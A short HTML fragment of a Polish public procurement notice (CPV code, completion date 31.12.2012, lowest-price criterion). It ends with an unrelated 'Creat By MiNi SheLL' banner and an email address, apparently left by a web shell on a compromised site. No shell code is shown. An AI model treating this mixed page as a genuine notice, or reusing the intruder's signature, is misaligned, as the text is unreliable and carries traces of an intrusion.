Szczegółowy opis przedmiotu zamówienia zamieszczony został w Rozdziale II SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 64.10.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com